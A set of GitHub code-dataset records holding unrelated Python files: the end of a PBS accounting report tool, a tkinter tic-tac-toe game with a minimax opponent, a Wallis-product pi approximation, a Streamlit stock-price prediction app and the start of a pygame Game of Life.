{total_cputime}\")\n if opts.user:\n print(\"Total CPU Time per User:\")\n for k, v in user_stat.items():\n if k[0] is None:\n k = ('None', 'None', frozenset())\n print(\"{:13} {:10} {:15} {}\".format(k[0], k[1], v, ','.join(k[2])))\n if opts.group:\n print(\"Total CPU Time per Group:\")\n for k, v in group_stat.items():\n if k is None:\n k = 'None'\n print(\"{:10} {:15}\".format(k, v))\n\n\ndef pre_main():\n parser = argparse.ArgumentParser(description='Statistic information of PBS accounting data.')\n parser.add_argument('start_date',\n help='Start date. Format is [[yy]yy]mmdd. Year is set to current year if not specified.')\n parser.add_argument('end_date', nargs='?', help='Same as start_date. If not specified, treat as today.')\n parser.add_argument('-v', '--verbose', action='store_true', help='Print all job stats at the end.')\n parser.add_argument('-u', '--user', action='store_true', help='Group by user.')\n parser.add_argument('-g', '--group', action='store_true', help='Group by group.')\n parser.add_argument('-U', '--only-user', action='append', help='Only count in specified user.', default=[])\n parser.add_argument('-G', '--only-group', action='append', help='Only count in specified group.', default=[])\n parser.add_argument('-Q', '--only-queue', action='append', help='Only count in specified queue.', default=[])\n parser.add_argument('-R', '--ignore-queue', action='append',\n help='Treat specified queue as router queues (do not include them in the final result).', default=[])\n parser.add_argument('-D', '--debug-multiqueue', action='store_true',\n help='Print job stats for multi-queue jobs (which is considered unusual, and might be a hint for jobid conflicts).')\n opts = parser.parse_args()\n # print(opts)\n\n nowtime = pytz.utc.localize(datetime.datetime.now())\n start_time = smart_time_parser(opts.start_date, nowtime)\n end_time = smart_time_parser(opts.end_date, nowtime)\n filelist = []\n t = start_time[1]\n while t <= end_time[1]:\n filelist.append('%04d%02d%02d' % (t.year, t.month, t.day))\n t += datetime.timedelta(days=1)\n\n end_time_str = (end_time[1]+datetime.timedelta(hours=23, minutes=59, seconds=59)).strftime('%m/%d/%Y %H:%M:%S')\n\n main(start_time[0], end_time_str, filelist, opts)\n\n\npre_main()\n","repo_name":"runapp/pbs_report","sub_path":"pbs_report.py","file_name":"pbs_report.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19386328516","text":"from tkinter import *\nimport os\n\n\n'''\nBOARD STRUCTURE (list representation)\n[\n[ 1, 2, 3 ],\n[ 4, 5, 6 ],\n[ 7, 8, 9 ]\n]\nEach inner list represents a row\n'''\n\n\nclass CharPrompt(Toplevel):\n\n ''' Toplevel prompting the user to pick X or O to play with '''\n\n TITLE = \"\"\n TEXT = \"Choose X or O\"\n BUTTON_SIZE = 70\n LBL_FONT = (\"Calibri\", 16)\n BTN_FONT = (\"Calibri\", 30)\n RESIZABLE = False\n \n def __init__(self, master : Misc):\n super().__init__(master)\n self.title(CharPrompt.TITLE)\n self.resizable(width = CharPrompt.RESIZABLE, height = CharPrompt.RESIZABLE)\n self.label = Label(self, text = CharPrompt.TEXT, font = CharPrompt.LBL_FONT)\n self.label.grid(row = 0, columnspan = 2, sticky = EW)\n # X Button\n self.xframe = Frame(self, height = CharPrompt.BUTTON_SIZE, width = CharPrompt.BUTTON_SIZE)\n self.xframe.grid_propagate(0)\n self.xframe.grid_rowconfigure(0, weight = 1)\n self.xframe.grid_columnconfigure(0, weight = 1)\n self.xbtn = Button(\n self.xframe, text = App.X, font = CharPrompt.BTN_FONT, command = self.chooseX)\n self.xframe.grid(row = 1, column = 0)\n self.xbtn.grid(sticky = NSEW)\n # O Button\n self.oframe = Frame(self, height = CharPrompt.BUTTON_SIZE, width = CharPrompt.BUTTON_SIZE)\n self.oframe.grid_propagate(0)\n self.oframe.grid_rowconfigure(0, weight = 1)\n self.oframe.grid_columnconfigure(0, weight = 1)\n self.obtn = Button(\n self.oframe, text = App.O, font = CharPrompt.BTN_FONT, command = self.chooseO)\n self.oframe.grid(row = 1, column = 1)\n self.obtn.grid(sticky = NSEW)\n # To store the selected character (stays \"\" if user closes window without choosing)\n self.selected = \"\"\n \n def chooseX(self):\n self.selected = App.X\n self.destroy()\n\n def chooseO(self):\n self.selected = App.O\n self.destroy()\n\n def get_result(self) -> str:\n return self.selected\n\n\nclass EndPrompt(Toplevel):\n\n ''' Toplevel showing the result of the game, with options to quit or restart '''\n\n TITLE = \"Game over\"\n WIN = \"You won!\"\n LOSS = \"You lost!\"\n DRAW = \"A draw!\"\n RESTART = \"Restart\"\n QUIT = \"Quit\"\n BTN_FONT = (\"Calibri\", 16)\n BTN_WIDTH = 8\n LBL_FONT = (\"Calibri\", 16)\n RESIZABLE = False\n\n def __init__(self, master : Misc, result : str):\n super().__init__(master)\n self.title(EndPrompt.TITLE)\n self.resizable(width = EndPrompt.RESIZABLE, height = EndPrompt.RESIZABLE)\n # Label\n self.label = Label(self, text = result, font = EndPrompt.LBL_FONT)\n self.label.grid(row = 0, columnspan = 2, sticky = NSEW)\n # Restart button\n self.restart_btn = Button(\n self, text = EndPrompt.RESTART, width = EndPrompt.BTN_WIDTH, \n font = EndPrompt.BTN_FONT, command = self.choose_restart)\n self.restart_btn.grid(row = 1, column = 0, sticky = NSEW)\n # Quit button\n self.quit_btn = Button(\n self, text = EndPrompt.QUIT, width = EndPrompt.BTN_WIDTH, \n font = EndPrompt.BTN_FONT, command = self.choose_quit)\n self.quit_btn.grid(row = 1, column = 1, sticky = NSEW)\n # User wants to restart?\n self.restart = False\n\n def choose_quit(self):\n self.destroy()\n \n def choose_restart(self):\n self.restart = True\n self.destroy()\n\n def get_result(self) -> str:\n return self.restart\n\n\nclass Tile(Frame):\n\n ''' Button, with parent frame to set size in pixels '''\n\n FONT = (\"Calibri\", 30)\n SIZE = 90\n BUTTON_RELIEF = SUNKEN\n \n def __init__(self, master : Misc, row : int, col : int):\n # Both the height and width (as it is square)\n super().__init__(master, height = Tile.SIZE, width = Tile.SIZE)\n self.button = Button(self, text = App.PLACEHOLDER, font = Tile.FONT, relief = Tile.BUTTON_RELIEF, command = self.on_press)\n self.isTaken = False\n # Position in the grid (where top-left is 0, 0)\n self.row = row\n self.col = col\n self.grid_propagate(0)\n self.grid_rowconfigure(0, weight = 1)\n self.grid_columnconfigure(0, weight = 1)\n self.button.grid(sticky = NSEW)\n\n def on_press(self):\n ''' Handle click event '''\n self.master.player_move(self.row, self.col)\n \n def set_char(self, char : str):\n ''' Occupy the tile with the given character '''\n self.char = char\n self.button.config(text = self.char)\n self.isTaken = True\n \n def disable(self):\n ''' Prevent tile from being selected by user '''\n self.button.config(state = \"disabled\")\n\n def enable(self):\n ''' Allow user to select tile '''\n self.button.config(state = \"active\")\n\n def is_taken(self) -> bool:\n ''' Check if tile is occupied '''\n return self.isTaken\n\n\nclass App(Tk):\n\n ''' Main application window '''\n\n RESIZABLE = False\n TITLE = \"Tic-Tac-Toe\"\n X = \"X\"\n O = \"O\"\n PLACEHOLDER = \"\"\n BOARD_SIZE = 3\n DRAW_STATE = \"DRAW\"\n\n def __init__(self):\n super().__init__()\n self.title(App.TITLE)\n self.resizable(width = App.RESIZABLE, height = App.RESIZABLE)\n # Key bindings to close window\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n self.bind_all(\"\", self.on_close)\n # Initialise board and get player to choose X or O\n self.new_game()\n \n def init_board(self):\n ''' Set the initial empty board state and create tiles '''\n self.board = [[] for i in range(App.BOARD_SIZE)]\n self.tiles = [[] for i in range(App.BOARD_SIZE)]\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n tile = Tile(self, row, col)\n tile.grid(row = row, column = col)\n self.tiles[row].append(tile)\n self.board[row].append(App.PLACEHOLDER)\n\n def player_move(self, row : int, col : int):\n ''' Update the screen and board when user clicks on a tile '''\n tile = self.tiles[row][col]\n tile.set_char(self.player_char)\n self.make_move(row, col, self.player_char)\n self.disable_tiles()\n self.update()\n # Check whether end state reached\n result = self.check_board_state()\n if result == None:\n # Prompt AI to move if game is not over\n self.ai_move()\n else:\n self.endgame_prompt(result)\n\n def ai_move(self):\n ''' Find the best move via minimax then play it '''\n r, c = self.minimax()\n tile = self.tiles[r][c]\n tile.set_char(self.ai_char)\n self.make_move(r, c, self.ai_char)\n self.enable_tiles()\n # Check whether end state reached\n result = self.check_board_state()\n if result != None:\n self.endgame_prompt(result)\n\n def minimax(self, maximising : bool = True, depth : int = 1):\n ''' Find the optimal move for AI by recursion and evaluating end states '''\n # First check for end state\n result = self.check_board_state()\n if result == self.player_char:\n return -1\n elif result == self.ai_char:\n return 1\n elif result == App.DRAW_STATE:\n return 0\n \n # Get possible moves and play each one\n moves = self.get_moves()\n if maximising:\n # AI turn (wants the best score for the AI)\n best_score = -2\n for move in moves:\n r, c = move\n self.make_move(r, c, self.ai_char)\n score = self.minimax(maximising = (not maximising), depth = (depth + 1))\n self.undo_move(r, c)\n if score > best_score:\n best_score = score\n best_move = move\n # Can't be better\n if score == 1:\n break\n # If this is the original minimax call, ready to make the optimal move\n if depth == 1:\n # if best_score == 0:\n # os.system(\"cls\")\n # print(\"should be a draw\")\n # if best_score == 1:\n # os.system(\"cls\")\n # print(\"you will lose\")\n # if best_score == -1:\n # os.system(\"cls\")\n # print(\"you should win\")\n return best_move\n return best_score\n else:\n # Player turn (wants the worst score for the AI)\n worst_score = 2\n for move in moves:\n r, c = move\n self.make_move(r, c, self.player_char)\n score = self.minimax(maximising = (not maximising), depth = (depth + 1))\n self.undo_move(r, c)\n if score < worst_score:\n worst_score = score\n worst_move = move\n # Can't be worse\n if score == -1:\n break\n return worst_score\n\n def make_move(self, row : int, col : int, char : str):\n ''' Update board with a move '''\n self.board[row][col] = char\n\n def undo_move(self, row : int, col : int):\n ''' For use in minimax function '''\n self.board[row][col] = App.PLACEHOLDER\n\n def get_moves(self) -> list:\n ''' Returns list of tuples (row, col) '''\n moves = []\n for r in range(App.BOARD_SIZE):\n for c in range(App.BOARD_SIZE):\n char = self.board[r][c]\n if char == App.PLACEHOLDER:\n moves.append((r, c))\n return moves\n\n def check_board_state(self) -> str:\n ''' Check if board state is a win for player, win for AI, or a draw '''\n\n # Check rows\n for row in self.board:\n result = self.check_list(row)\n if result in (App.X, App.O):\n return result\n \n # Check columns\n for c in range(App.BOARD_SIZE):\n col = []\n for row in self.board:\n col.append(row[c])\n result = self.check_list(col)\n if result in (App.X, App.O):\n return result\n\n # Check diagonals\n diag1 = []\n diag2 = []\n for i in range(App.BOARD_SIZE):\n # Top-left to bottom-right\n diag1.append(self.board[i][i])\n # Top-right to bottom-left\n diag2.append(self.board[i][2-i])\n results = (self.check_list(diag1), self.check_list(diag2))\n # Check if either of the diagonals is full\n for result in results:\n if result in (App.X, App.O):\n return result\n\n # Check if board state is a draw (board will be full, and no win detected)\n filled = True\n for row in self.board:\n for x in row:\n if x == App.PLACEHOLDER:\n filled = False\n if filled:\n return App.DRAW_STATE\n\n def check_list(self, l : list) -> str:\n ''' Check for 3 in a row in the given list '''\n player_win = all(x == self.player_char for x in l)\n ai_win = all(x == self.ai_char for x in l)\n if player_win:\n return self.player_char\n elif ai_win:\n return self.ai_char\n else:\n return \"\"\n\n def disable_tiles(self):\n ''' Set all tile buttons to disabled state (while waiting for AI move) '''\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n self.tiles[row][col].disable()\n\n def enable_tiles(self):\n ''' Set all unoccupied tiles to enabled state '''\n for row in range(App.BOARD_SIZE):\n for col in range(App.BOARD_SIZE):\n tile = self.tiles[row][col]\n if not tile.is_taken():\n tile.enable()\n\n def new_game(self):\n ''' Initialise board and choose player char to start a new game '''\n #os.system(\"cls\")\n # Initialise board\n self.init_board()\n # Determine whether to play with X or O\n self.prompt_player_char()\n\n def prompt_player_char(self):\n ''' Create a toplevel prompt and for user to choose X or O '''\n # Hide window and wait for player to choose X or O before redrawing\n self.withdraw()\n prompt = CharPrompt(self)\n prompt.wait_window()\n result = prompt.get_result()\n # If prompt was closed by user, result will not hold X or O\n if result not in (App.X, App.O):\n self.on_close()\n self.player_char = result\n self.ai_char = App.X if self.player_char == App.O else App.O\n self.wm_deiconify()\n\n def endgame_prompt(self, result : str):\n ''' Create toplevel prompt and wait for user input '''\n if result == App.DRAW_STATE:\n result = EndPrompt.DRAW\n elif result == self.player_char:\n result = EndPrompt.WIN\n else:\n result = EndPrompt.LOSS\n prompt = EndPrompt(self, result = result)\n prompt.wait_window()\n # Does player want to restart?\n restart = prompt.get_result()\n if restart == True:\n self.new_game()\n else:\n self.on_close()\n\n def on_close(self, event = None):\n ''' Exit application '''\n self.destroy()\n exit()\n\n\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n","repo_name":"AshvinKooner/Tic-Tac-Toe","sub_path":"against_pc_oop_gui.pyw","file_name":"against_pc_oop_gui.pyw","file_ext":"pyw","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25463425878","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n########################################################################\n# (C) Alexandre Casamayou-Boucau, Pascal Chauvin, Guillaume Connan #\n# #\n# Complément de l'ouvrage : #\n# Programmation en Python pour les mathématiques #\n# Editeur : Dunod - Collection : Sciences Sup #\n# ISBN-13: 978-2100738311 - Licence : GPLv2 #\n########################################################################\n\nfrom entier import *\nfrom rationnel import *\n\n#\n# Formule de Wallis (approximation du nombre pi)\n#\np = rationnel(entier(2))\nfor n in range(1, 20):\n\tp *= rationnel((2*n)**2, (2*n-1)*(2*n+1))\nprint(\"Une approximation du nombre pi est\", p)\nprint(float(p))\n\n","repo_name":"mba-tradelab/programmation_python_mathematiques","sub_path":"sources/ch06/entier_rationnel/entier_rationnel-3/Wallis.py","file_name":"Wallis.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5285811192","text":"import math\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom keras.models import load_model\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nAAPL = \"AAPL Historical Data.csv\"\r\nAMZN = \"AMZN Historical Data.csv\"\r\nFB = \"FB Historical Data.csv\"\r\nGOOG = \"GOOG Historical Data.csv\"\r\nGOOGL = \"GOOGL Historical Data.csv\"\r\nMSFT = \"MSFT.csv\"\r\nNFLX = \"NFLX Historical Data.csv\"\r\n\r\nst.title('Your tool for stock trading')\r\nuser_input = st.text_input('Enter MSFT.csv, AAPL Historical Data.csv, AMZN Historical Data.csv, FB Historical Data.csv, GOOG Historical Data.csv, GOOGL Historical Data.csv, NFLX Historical Data.csv : ')\r\ndf = pd.read_csv(user_input)\r\ndf = df.set_index(pd.DatetimeIndex(df['Date'].values))\r\n\r\n# Describing data\r\nst.write(df.describe())\r\n\r\n# Visualization\r\nst.subheader('Closing price Vs Time chart')\r\nfig = plt.figure(figsize=(12,6))\r\nplt.plot(df.Close)\r\nst.pyplot(fig) \r\n\r\n# Create a new dataframe with close column\r\ndata = df.filter(['Close']) \r\n#convert dataframe to a numpy array\r\ndataset = data.values\r\n#Get the number of rows to train the model on\r\ntraining_data_len = math.ceil(len(dataset) * 0.8)\r\n\r\n#Scale the data\r\nscaler = MinMaxScaler(feature_range=(0,1))\r\nscaled_data = scaler.fit_transform(dataset)\r\n\r\n\r\n# load model\r\nmodel = load_model('keras_model.h5')\r\n\r\ntest_data=scaled_data[training_data_len-60:,:]\r\n#create x_test and y_test\r\nx_test=[]\r\ny_test=dataset[training_data_len:,:]\r\nfor i in range(60,len(test_data)):\r\n x_test.append(test_data[i-60:i,0])\r\n\r\n\r\n#Convert data into numpy array\r\nx_test=np.array(x_test)\r\n#Reshape the data\r\nx_test=np.reshape(x_test,(x_test.shape[0],x_test.shape[1],1))\r\n\r\n#Getting the model's predicted values\r\npredictions=model.predict(x_test)\r\npredictions=scaler.inverse_transform(predictions)\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Plot the data\r\ntrain = data[:training_data_len]\r\nvalid = data[training_data_len:]\r\nvalid['Predictions']=predictions\r\n#visualize the data\r\nst.subheader(\"Predictions Vs Original\")\r\nfig1 = plt.figure(figsize=(16,8))\r\nplt.title('Predictions Vs Original')\r\nplt.xlabel('Date',fontsize=18)\r\nplt.ylabel('Close Price ($)',fontsize=18)\r\nplt.plot(train['Close'])\r\nplt.plot(valid[['Close','Predictions']])\r\nplt.legend(['Train','val','Predictions'],loc='lower right')\r\nst.pyplot(fig1)\r\n\r\nnew_df = pd.read_csv(user_input)\r\nnew_df = new_df.filter(['Close'])\r\nlast_60_days = new_df[-60:].values\r\n# Scale the data to be values between 0 and 1\r\nlast_60_days_scaled = scaler.transform(last_60_days)\r\n# create an empty list\r\nX_test = []\r\n# append the past 60 days\r\nX_test.append(last_60_days_scaled)\r\n# convert the X_test dataset to a numpy\r\nX_test = np.array(X_test)\r\n# reshape the data\r\nX_test = np.reshape(X_test,(X_test.shape[0], X_test.shape[1],1))\r\n# get the predicted scaled price\r\npred_price = model.predict(X_test)\r\n#undo the scaling\r\npred_price = scaler.inverse_transform(pred_price)\r\nst.write(\"The predicted price is \")\r\nst.write(pred_price)\r\n","repo_name":"benzionh/stock-price-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43802016604","text":"import pygame\nimport config\nimport math as maths\nimport time\nimport copy\n\nFont = config.Font\nDead = 0\nSquare = 1\n\n\nclass Player:\n def __init__(self, number, colour, starting_turns):\n self.Number = number\n self.Colour = colour\n self.NoOfCells = 0\n self.SpareTurns = starting_turns\n\n\nclass Menu:\n def __init__(self):\n self.ButtonHeight = config.M_ButtonHeight\n self.ButtonWidth = config.M_ButtonWidth\n self.ButtonBorder = config.M_ButtonBorder\n self.ButtonGapSize = config.M_ButtonGapSize\n self.SideGapSize = config.M_SideGapSize\n self.TextSize = config.M_TextSize\n self.TitleGapSize = config.M_TitleGapSize\n self.TitleTextSize = config.M_TitleTextSize\n self.Buttons = (\"Simulator\", \"2-Player Game\", \"Help\", \"Quit\")\n self.Colour = config.M_Colour\n \n def get_choice(self, screen):\n pygame.display.set_caption(\"Game of Life - Main Menu\")\n pygame.display.set_mode((2 * self.SideGapSize + self.ButtonWidth,\n 2 * self.TitleGapSize + len(self.Buttons)\n * (self.ButtonHeight + self.ButtonGapSize)))\n screen.fill(self.Colour[\"Background\"])\n fps_limiter = pygame.time.Clock() # Limits the FPS, as a high frame rate here is pointless\n buttons = [[screen.get_width() // 2, 2 * self.TitleGapSize\n + a * (self.ButtonHeight + self.ButtonGapSize) + self.TitleTextSize,\n self.Buttons[a], self.Colour[\"Text\"]] for a in range(len(self.Buttons))]\n for a in range(len(self.Buttons)):\n # Draws a rectangle the same colour as the background in a border-coloured rectangle\n pygame.draw.rect(screen, self.Colour[\"Border\"],\n (buttons[a][0] - self.ButtonWidth // 2,\n buttons[a][1] - self.ButtonHeight // 2,\n self.ButtonWidth, self.ButtonHeight))\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n ((buttons[a][0] - self.ButtonWidth // 2 + self.ButtonBorder,\n buttons[a][1] - self.ButtonHeight // 2 + self.ButtonBorder,\n self.ButtonWidth - self.ButtonBorder * 2,\n self.ButtonHeight - self.ButtonBorder * 2)))\n \n write(screen, screen.get_width() // 2, self.TitleGapSize, \"Main Menu\", self.Colour[\"Text\"],\n self.TitleTextSize, alignment=(\"centre\", \"centre\")) # Writes the title\n \n while True:\n if check_quit(pygame.event.get()):\n quit_game()\n x, y = pygame.mouse.get_pos()\n for a in range(len(self.Buttons)):\n buttons[a][3] = self.Colour[\"Text\"] # Resets the colour of all buttons\n width = screen.get_width()\n if width / 2 - self.ButtonWidth / 2 < x < width / 2 + self.ButtonWidth / 2:\n for a in range(len(self.Buttons)):\n height = buttons[a][1]\n if height - self.ButtonHeight / 2 < y < height + self.ButtonHeight / 2:\n if pygame.mouse.get_pressed()[0]:\n return buttons[a][2]\n buttons[a][3] = self.Colour[\"Hover\"] # Changes the colour of the button\n for a in range(len(self.Buttons)): # if it's being hovered over\n write(screen, screen.get_width() // 2, buttons[a][1], buttons[a][2], buttons[a][3],\n self.TextSize, alignment=(\"centre\", \"centre\")) # Writes on the buttons\n pygame.display.update()\n fps_limiter.tick(config.FPS) # Limits to a certain FPS\n\n\nclass Sim:\n \"\"\"Change these values to change how the game looks and behaves in Simulator mode.\"\"\"\n \n def __init__(self):\n self.Width = config.S_Width\n self.Height = config.S_Height\n self.Size = config.S_Size\n self.CellGap = config.S_CellGap\n self.Wrap = config.S_Wrap\n self.Cushion = config.S_Cushion\n self.PreviewSize = 0\n self.SetUpChances = config.S_SetUpChances\n self.SliderSize = config.S_SliderSize\n self.HighlightSize = config.S_HighlightSize\n self.NoOfNotches = config.S_NoOfNotches\n self.NotchLength = config.S_NotchLength\n self.StartOfSlider = 2 * self.NotchLength\n self.SpeedSize = config.S_SpeedSize\n self.EndOfSlider = self.Height * self.Size - self.HighlightSize - self.NotchLength\n self.SpaceBetweenNotches = (self.EndOfSlider - self.StartOfSlider) / (self.NoOfNotches - 1)\n self.SliderY = self.Size * self.Width + self.CellGap // 2 + self.SliderSize // 2\n self.ButtonStart = self.Size * self.Width\n self.GPS = config.S_GPS\n self.TopGPS = config.S_TopGPS\n self.BottomGPS = config.S_BottomGPS\n self.GPSIsLimited = True\n self.Paused = True\n self.OneTurn = False\n self.HeldDown = {\"space\": True, # This is used to keep track of whether a button has just\n \"right\": True, # been pressed or was held down during the last check too.\n \"number\": True,\n \"f\": True}\n self.Colour = config.S_Colour\n \n def run(self, screen, board):\n \"\"\"Runs the simulation\"\"\"\n pygame.display.set_caption(\"Game of Life\")\n pygame.display.set_mode((board.Size * board.Width + self.SliderSize,\n board.Size * board.Height))\n screen.fill(self.Colour[\"Background\"])\n self.draw_gps_slider(screen, ((maths.log(self.GPS, 10) + 1) // -3)\n * (self.EndOfSlider - self.StartOfSlider) + self.EndOfSlider,\n self.GPSIsLimited, board)\n last_frame = time.time()\n board.update()\n board.draw(screen)\n \n while not self.check_user_input(screen, board):\n board.update()\n if (not self.Paused\n and (not self.GPSIsLimited or time.time() - last_frame > 1 / self.GPS))\\\n or (self.Paused and self.OneTurn): # If the board should be updated\n if self.OneTurn:\n self.OneTurn = False\n board.take_turn(update_caption=True)\n board.update()\n board.Generations += 1\n board.draw(screen)\n last_frame = time.time() # Stores the time the screen was updated to limit the GPS\n \n def check_user_input(self, screen, board):\n \"\"\"Checks for user input and acts accordingly\"\"\"\n \n go_back = check_quit(pygame.event.get()) # Whether the player tried to quit to the menu\n x, y = pygame.mouse.get_pos()\n a, b = board.get_square(x, y)\n if pygame.key.get_pressed()[pygame.K_SPACE] and not self.HeldDown[\"space\"]:\n self.Paused = not self.Paused\n if pygame.key.get_pressed()[pygame.K_f] and not self.HeldDown[\"f\"]:\n self.GPSIsLimited = not self.GPSIsLimited\n bottom_gps_log = maths.log(self.BottomGPS, self.TopGPS)\n self.draw_gps_slider(screen, self.EndOfSlider\n - ((maths.log(self.GPS, self.TopGPS) - bottom_gps_log)\n * (self.EndOfSlider - self.StartOfSlider))\n // (1 - bottom_gps_log), self.GPSIsLimited, board)\n if pygame.key.get_pressed()[pygame.K_RIGHT] and not self.HeldDown[\"right\"]:\n self.OneTurn = True\n else:\n self.OneTurn = False\n if pygame.key.get_pressed()[pygame.K_RETURN]:\n board.reset(self)\n board.draw(screen)\n self.Paused = True\n if pygame.mouse.get_pressed()[0]:\n if board.Size * board.Width + board.CellGap / 2 < x < (\n board.Size * board.Width) + self.SliderSize + board.CellGap / 2:\n if y < self.StartOfSlider: # Doesn't allow the player to drag the slider out of\n y = self.StartOfSlider # the area where it should be (ie. off the screen)\n elif y > self.EndOfSlider:\n y = self.EndOfSlider\n self.GPSIsLimited = True\n self.draw_gps_slider(screen, y, self.GPSIsLimited, board)\n bottom_gps_log = maths.log(self.BottomGPS, self.TopGPS)\n self.GPS = self.TopGPS ** (((1 - bottom_gps_log) * (self.EndOfSlider - y)\n / (self.EndOfSlider - self.StartOfSlider)) + bottom_gps_log)\n elif 0 <= a < board.Width + board.Cushion and 0 <= b < board.Height + board.Cushion:\n board.Cell[a][b].birth(Square, 0) # checks the mouse is over the board so as to\n board.update() # avoid trying to change a cell where none exists\n board.draw(screen)\n if pygame.mouse.get_pressed()[2] and 0 <= a < board.Width\\\n + board.Cushion and 0 <= b < board.Height + board.Cushion:\n board.Cell[a][b].kill()\n board.update()\n board.draw(screen)\n number_pressed = False\n for key in range(pygame.K_1, pygame.K_9):\n if pygame.key.get_pressed()[key]:\n if not self.HeldDown[\"number\"]:\n board.place_preset(screen, int(pygame.key.name(key)), a, b)\n number_pressed = True\n self.HeldDown[\"number\"] = number_pressed\n for key in ((\"space\", \"SPACE\"), (\"f\", \"f\"), (\"right\", \"RIGHT\")):\n self.HeldDown[key[0]] = eval(\"pygame.key.get_pressed()[pygame.K_%s]\" % key[1])\n \n return go_back\n \n def draw_gps_slider(self, screen, y, gps_limit, board):\n \"\"\"Draws the slider with the y coordinate of the button click\n (How many GPS this corresponds to is not dealt with here.)\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"], # Erases the last drawing of of the\n ((self.ButtonStart, self.StartOfSlider - self.NotchLength), # slider\n (self.ButtonStart + board.CellGap + self.HighlightSize + self.SliderSize,\n self.EndOfSlider)))\n pygame.draw.line(screen, self.Colour[\"Text\"], (self.SliderY, self.StartOfSlider),\n (self.SliderY, self.EndOfSlider))\n for n in range(self.NoOfNotches): # Draws the notches\n pygame.draw.line(screen, self.Colour[\"Text\"],\n (self.SliderY - self.NotchLength // 2,\n self.StartOfSlider + int(n * self.SpaceBetweenNotches)),\n (self.SliderY + self.NotchLength // 2,\n self.StartOfSlider + int(n * self.SpaceBetweenNotches)))\n write(screen, (self.Size * self.Width + self.SliderY - self.NotchLength) // 2,\n (self.StartOfSlider + self.EndOfSlider) // 2, \"Speed\", self.Colour[\"Text\"],\n self.SpeedSize, rotate=90, alignment=(\"centre\", \"centre\"))\n if gps_limit: # Gets te correct colour for the pointer\n colour = \"Highlighter\"\n else:\n colour = \"Unselected\"\n pygame.draw.polygon(screen, self.Colour[colour], # Draws the pointer\n ((self.SliderY + self.NotchLength // 2, y),\n (self.SliderY + self.NotchLength, y - self.NotchLength // 2),\n (self.SliderY + 2 * self.NotchLength, y - self.NotchLength // 2),\n (self.SliderY + 2 * self.NotchLength, y + self.NotchLength // 2),\n (self.SliderY + self.NotchLength, y + self.NotchLength // 2)))\n pygame.display.update()\n\n\nclass Game:\n def __init__(self):\n self.Width = config.G_Width\n self.Height = config.G_Height\n self.Size = config.G_Size\n self.CellGap = config.G_CellGap\n self.Wrap = True\n self.Cushion = 0\n self.Turns = 0\n self.Gens = 0\n self.NoOfPlayers = config.G_NoOfPlayers\n self.PlayerNames = config.G_PlayerNames[:self.NoOfPlayers]\n self.PreviewSize = config.G_PreviewSize\n self.SetUpChances = config.G_SetUpChances[:self.NoOfPlayers + 1]\n self.TextSize = config.G_TextSize\n self.RightColumnSize = config.G_RightColumnSize\n self.ButtonHeight = config.G_ButtonHeight\n self.ButtonBorderSize = config.G_ButtonBorderSize\n self.WinMessageWidth = config.G_WinMessageWidth\n self.WinMessageHeight = config.G_WinMessageHeight\n self.PartImmune = config.G_PartImmune\n self.PartImmuneTime = config.G_PartImmuneTime\n self.PartImmuneKill = config.G_PartImmuneKill\n self.FullImmune = config.G_FullImmune\n self.FullImmuneTime = config.G_FullImmuneTime\n self.FullImmuneKill = config.G_FullImmuneKill\n self.Colour = config.G_Colour\n self.CurrentPlayer = 1\n self.IsTurnLimit = config.G_IsTurnLimit\n self.TurnLimit = config.G_TurnLimit\n self.IsGenLimit = config.G_IsGenLimit\n self.GenLimit = config.G_GenLimit\n self.BoardAmountWin = config.G_BoardAmountWin\n self.BoardAmount = config.G_BoardAmount\n self.PlayerAmountWin = config.G_PlayerAmountWin\n self.PlayerAmount = config.G_PlayerAmount\n self.StartingTurns = config.G_StartingTurns\n self.FairerTurns = config.G_FairerTurns\n self.Started = False\n self.TurnsPerRound = config.G_TurnsPerRound\n self.Players = [Player(n, self.Colour[\"Player\" + str(n)], self.StartingTurns)\n for n in range(1, self.NoOfPlayers + 1)]\n \n def run(self, screen, board):\n \"\"\"Runs the game\"\"\"\n board.update()\n board.draw(screen)\n screen = pygame.display.set_mode((board.Size * board.Width + self.RightColumnSize,\n board.Size * board.Height))\n screen.fill(self.Colour[\"Background\"])\n fps_limiter = pygame.time.Clock()\n if not self.Started: # Sets up the game if it has not already ben started\n self.Started = True\n if self.FairerTurns:\n for p in range(self.NoOfPlayers // 2):\n self.Players[p].SpareTurns -= self.TurnsPerRound // 2\n while True:\n caption = \" - Generations: \" + str(self.Gens) # Adds info into the caption if it is needed\n if self.IsGenLimit:\n caption += \", (%s)\" % str(self.GenLimit)\n caption += \", Turns: \" + str(self.Turns)\n if self.IsTurnLimit:\n caption += \" (%s)\" % str(self.TurnLimit)\n if self.BoardAmountWin:\n caption += \", Cells needed to win: \" + str(maths.floor(self.BoardAmount\n * self.Width * self.Height))\n if self.PartImmune:\n caption += \", Part Immune after %s Turns\" % str(self.PartImmuneTime)\n if self.FullImmune:\n caption += \", Fully Immune after %s Turns\" % str(self.FullImmuneTime)\n pygame.display.set_caption(\"Game of Life - Game\" + caption)\n player_scores = self.get_player_scores(board)\n for p in range(self.NoOfPlayers):\n self.Players[p].NoOfCells = player_scores[p + 1]\n self.Players[self.CurrentPlayer - 1].SpareTurns += self.TurnsPerRound # Gives current\n turn = self.take_turn(screen, board, self.CurrentPlayer) 